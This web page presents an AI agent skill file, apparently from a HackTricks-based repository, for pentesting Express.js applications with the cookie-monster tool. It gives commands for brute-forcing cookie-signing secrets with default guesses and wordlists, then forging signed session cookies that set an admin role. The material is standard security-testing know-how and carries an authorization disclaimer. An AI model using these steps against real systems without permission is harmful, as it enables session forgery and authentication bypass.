OpenSkillIndex← back to search

Hacktricks-skills nodejs-express-cookie-pentest

Pentest NodeJS Express.js applications by testing and cracking cookie signatures. Use this skill whenever you need to test Express.js cookie secrets, sign/verify cookies, or perform cookie-based authentication bypass testing. Trigger this skill for any web application security testing involving Express.js sessions, cookie-monster tool usage, or cookie signature brute-forcing.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/nodejs-express/SKILL.MD
source content

NodeJS Express Cookie Pentesting

A skill for testing and cracking Express.js cookie signatures using the cookie-monster tool.

When to Use This Skill

Use this skill when:

  • Testing Express.js web applications for cookie signature vulnerabilities
  • Attempting to crack cookie secrets using wordlists
  • Signing new cookies with a known secret
  • Performing batch cookie testing across multiple cookies
  • Analyzing session cookies for security weaknesses

Prerequisites

  1. Install cookie-monster:

    pip install cookie-monster

  2. Have access to target cookies - Extract cookies from browser dev tools or HTTP responses

Cookie Signature Testing

Test a Single Cookie

When you have one cookie to test against a known or suspected secret:

cookie-monster -c <cookie_value> -s <secret_key> -n <cookie_name>

Example:

cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session

Parameters:

  • -c
    : The cookie value (base64 encoded)
  • -s
    : The secret key to test
  • -n
    : The cookie name (e.g., 
    session
    , 
    connect.sid
    )

Test with Custom Wordlist

Brute-force the cookie secret using a custom wordlist:

cookie-monster -c <cookie_value> -s <secret_key> -w <wordlist_path>

Example:

cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst

Common wordlists to try:

  • /usr/share/wordlists/rockyou.txt
  • /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
  • Custom wordlists based on target organization naming conventions

Batch Mode - Test Multiple Cookies

When you have multiple cookies to test, use batch mode:

cookie-monster -b -f cookies.json

cookies.json format:

[
  {
    "cookie": "eyJmb28iOiJiYXIifQ==",
    "secret": "LVMVxSNPdU_G8S3mkjlShUD78s4",
    "name": "session"
  },
  {
    "cookie": "another_cookie_value",
    "secret": "another_secret",
    "name": "connect.sid"
  }
]

Batch Mode with Custom Wordlist

Test multiple cookies against a wordlist:

cookie-monster -b -f cookies.json -w custom.lst

Create and Sign New Cookies

If you've discovered the secret key, you can forge new cookies:

cookie-monster -e -f new_cookie.json -k <secret_key>

new_cookie.json format:

{
  "name": "session",
  "data": {
    "user_id": 123,
    "role": "admin",
    "email": "attacker@example.com"
  }
}

Output: The tool will output a signed cookie you can use in your requests.

Workflow Guide

Step 1: Extract Cookies

  1. Open browser DevTools → Application → Cookies
  2. Copy the cookie value (the part after the 
    =
    )
  3. Note the cookie name

Step 2: Initial Testing

Try common secrets first:

# Common Express.js defaults to try
cookie-monster -c <cookie> -s "secret" -n session
cookie-monster -c <cookie> -s "changeme" -n session
cookie-monster -c <cookie> -s "express" -n session

Step 3: Wordlist Attack

If common secrets fail, use a wordlist:

cookie-monster -c <cookie> -s <cookie> -w /path/to/wordlist.txt -n session

Step 4: Forge New Cookie

Once you have the secret, create a new cookie with elevated privileges:

cookie-monster -e -f new_cookie.json -k <discovered_secret>

Common Express.js Cookie Names

  • session
  • connect.sid
  • express.sid
  • sess
  • JSESSIONID
  • PHPSESSID

Tips

  1. Check for weak secrets - Many apps use predictable secrets like 
    secret
    , 
    changeme
    , or company names
  2. Look for secrets in source code - Check GitHub, config files, environment variables
  3. Use multiple wordlists - Combine general wordlists with target-specific ones
  4. Test in batch - If you have multiple cookies, batch mode is more efficient
  5. Document findings - Keep track of which secrets work for which applications

Security Considerations

  • Only test applications you have authorization to pentest
  • Document all findings for the security team
  • Report cookie signature vulnerabilities as they can lead to session hijacking
  • Recommend using strong, randomly generated secrets in production

Integration with Other Tools

  • Burp Suite: Extract cookies from proxy history
  • Browser DevTools: Monitor cookie changes in real-time
  • curl: Test forged cookies in HTTP requests
  • Postman: Import forged cookies for API testing